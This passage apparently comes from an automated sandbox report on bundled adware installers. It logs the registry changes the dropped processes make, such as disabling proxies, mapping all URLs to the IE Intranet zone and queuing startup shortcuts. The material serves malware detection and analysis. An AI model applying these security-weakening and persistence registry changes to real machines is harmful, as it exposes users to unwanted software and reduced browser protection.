Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Dropped deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process FHSev.exe:2280 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 00 E4 77 A1 A4 D4 1F DD B6 42 6F 16 E8 E2 53"
The process FHSev.exe:2212 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E CA A4 D3 97 1B 0F 31 A7 D6 25 C2 E1 F2 89 95"
The process FHSev.exe:2328 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F AD EA 35 C9 01 7F 3C B9 55 EF 98 F8 B0 F0 D1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
The Dropped modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Dropped modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Dropped deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process FHSev.exe:968 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 1D 36 16 62 50 F6 16 91 B5 69 20 8E 55 A2 44"
The process AlmDayQuick.exe:2908 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 20 C5 BF 05 81 00 35 46 8C 00 02 56 AD 90 34"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
The process Application Dataypfbyfgmr.tmp:2860 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 79 74 AA 83 B5 3D B6 46 AE E0 79 9B E1 B5 16"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process juese.exe:2488 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1404370428"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014091820140919]
"CacheRepair" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014091820140919]
"CachePrefix" = ":2014091820140919:"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014091820140919]
"CacheOptions" = "11"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "juese.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel]
"{871C5380-42A0-1069-A2EA-08002B30309D}" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 26 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 03 80 96 1A F7 90 AF 11 E3 A0 B3 65 83 14 4F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014091820140919]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014091820140919\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014091820140919]
"CacheLimit" = "8192"
The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Dropped modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Dropped modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Dropped deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140318]
The Dropped deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process sjss_jing_zhimeng_217.exe:1724 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\速捷搜索]
"Publisher" = "sjss.inc"
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\sjss.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\速捷搜索]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\uninstall.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\sjss]
"sjss.exe" = "sjss"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 05 B4 1C 20 E9 29 1F 71 5D 20 1D 06 4E 5B 9B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\速捷搜索]
"DisplayName" = "速捷搜索"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Documents and Settings%\%current user%\Local Settings\Application Data\速捷搜索.lnk, \??\%Documents and Settings%\%current user%\Start Menu\Programs\Startup\速捷搜索.lnk"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\速捷搜索]
"DisplayVersion" = "1.0.0.4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Dropped modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Dropped modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Dropped deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process sjss.exe:216 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 D7 00 3C FE 02 4C 47 4F FC 83 5C EC 27 F7 E1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process a-zm-157391-v5.exe:2236 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\绝色唐门]
"DisplayVersion" = "1.1.0.3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"OfficeAssist.0195.80.1015.exe" = "Kingsoft Install Application"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 27 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\绝色唐门]
"UninstallString" = "%Program Files%\jstm\unist.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\绝色唐门]
"DisplayName" = "绝色唐门"
"Publisher" = ""
"DisplayIcon" = "%Program Files%\jstm\juese.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel]
"{871C5380-42A0-1069-A2EA-08002B30309D}" = "1"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"Almanac_clnh_2014.8.3._126cl.exe" = "今日黄历安装向导"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 F4 52 49 4B A9 DF 4D A4 AB 50 57 F7 8D B6 53"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Dropped modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Dropped modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Dropped deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process setup_2949-14598.exe:612 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D BD 41 70 CA FF 35 65 37 34 6F 50 2E BC A6 FB"
The process OfficeAssist.0195.80.1015.exe:1628 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 0E DE 87 4F 56 E0 DD E4 B5 D1 11 5D 8C 9A DA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Documents and Settings%\%current user%\Local Settings\Application Data\速捷搜索.lnk, \??\%Documents and Settings%\%current user%\Start Menu\Programs\Startup\速捷搜索.lnk, \??\%Documents and Settings%\%current user%\Local Settings\Application Data\速捷搜索.lnk, \??\%Documents and Settings%\%current user%\Start Menu\Programs\Startup\速捷搜索.lnk, \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\1.png, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\10.png, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\100.png, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\101.png, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\102.png, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\103.png, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\104.png, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\11.png, , 